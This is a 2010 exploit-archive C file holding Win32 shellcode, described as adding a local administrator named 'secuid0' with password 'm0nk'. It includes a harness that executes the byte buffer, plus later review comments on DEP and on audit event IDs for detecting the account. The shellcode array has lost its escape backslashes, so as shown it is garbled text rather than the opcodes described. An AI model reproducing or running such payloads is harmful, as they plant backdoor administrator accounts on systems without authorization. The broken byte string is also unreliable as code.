
# Title : generic win32 - add new local administrator 326 bytes
# Published : 2010-10-04
# Author :


/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Payload buffer that main() casts to a function pointer and calls.
 *
 * According to the file header this is an encoded Win32 payload (326 bytes)
 * that adds a new local administrator; the status message in main() names
 * the account "secuid0". That purpose is taken from the header and the
 * message, not verified from the bytes.
 *
 * NOTE(review): the string literals below contain no backslashes, so as
 * written each "xNN" group is three ASCII characters rather than a single
 * hex-escaped byte. The escape prefixes appear to have been lost when the
 * page was extracted; the array as shown is plain text, not the opcode
 * stream the header describes.
 *
 * Defensive context: the documented effect (local account creation plus
 * addition to a privileged local group) is visible in the Security log when
 * account-management auditing is enabled -- event IDs 624 and 636 on
 * Windows XP/2003, 4720 and 4732 on later versions. The account name printed
 * by main() can be used as a search term when reviewing local accounts and
 * those events.
 */
char code[] =
"xdaxdexd9x74x24xf4xb8x22xd2x27x7ax29xc9xb1x4b"
"x5bx31x43x1ax83xebxfcx03x43x16xe2xd7x3bxbcx7a"
"x17xbcx95x4bxd7xd8x92xecxe7xa5x65x94x08x2dx25"
"x69x9dx41xbaxdcx2axe1xcaxf7x25xe2xcax07xbexa2"
"xfex8ax80x5ex74xd4x3cxc1x49xb5xb7x91x69x12x4c"
"x2cx4exd1x06xaaxd6xe4x4cx3fx6cxffx1bx1ax51xfe"
"xf0x78xa5x49x8dx4bx4dx48x7fx82xaex7axbfx19xfc"
"xf9xffx96xfaxc0x30x5bx04x04x25x90x3dxf6x9dx71"
"x37xe7x56xdbx93xe6x83xbax50xe4x18xc8x3dxe9x9f"
"x25x4ax15x14xb8xa5x9fx6ex9fx29xc1xadx72x01x53"
"xd9x27x5dxacxe6xb1xa5xd2xdcxcaxa9xd4xdcx4bx6e"
"xd0xdcx4bx71xe0x12x3ex97xd1x42xd8x57xd6x92x43"
"xa9x5cx9cx0dx8ex83xd3x70xc2x4cx13x73x1bxc4xf6"
"x9bx43x29x07xa4xfdx17x1cxb9xa0x1ax9fx3axd4xd4"
"xdex82xeex16xe0x04x07xa0x1fxfbx28x26xd1x5fxe6"
"x79xbdx0cxf7x2fx39x82xc7x80xbexb1xcfxc8xadxc5"
"x2fxf7x4ex57xb4x26xf5xdfx51x17xdax7cxbax39x41"
"xf7x9axb0xfax92xa8x1ax8fx39x2ex2ex06xa6x80xf0"
"xb5x16x8fx9bx65x78x2ex38x01xa6x96xe6xe9xc8xb3"
"x92xc9x78x53x38x68xedxccxccx05x98x62x11xb8x06"
"xeex38x54xaex83xcexdax51x10x40x68xe1xf8xedxe9"
"x66x8cx78x95x58x4ex54x34xfdxeaxaa";

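/*
 * Test harness: calls the code[] buffer as if it were a function, then
 * prints the credentials the payload is documented to create.
 *
 * Review notes:
 *  - Converting an object pointer to a function pointer and calling through
 *    it is not defined by ISO C. It only works where the platform allows a
 *    data buffer to be executed; where DEP/NX is enforced for the process
 *    the call is expected to fault instead -- confirm against the build and
 *    target configuration.
 *  - The message is printed unconditionally once the call returns. Nothing
 *    here checks whether the account was actually created, so the output is
 *    not evidence of success or failure.
 *  - The escape sequences in the message had lost their backslashes
 *    ("tUsername", "nttt"); they are restored to tab/newline so the text
 *    prints as laid out.
 *
 * argc and argv are unused.
 */
int main(int argc, char **argv)
{
	(void)argc;
	(void)argv;

	/* Explicit (void) prototype instead of an unprototyped () cast. */
	void (*entry)(void) = (void (*)(void))code;
	entry();

	printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
	return 0;
}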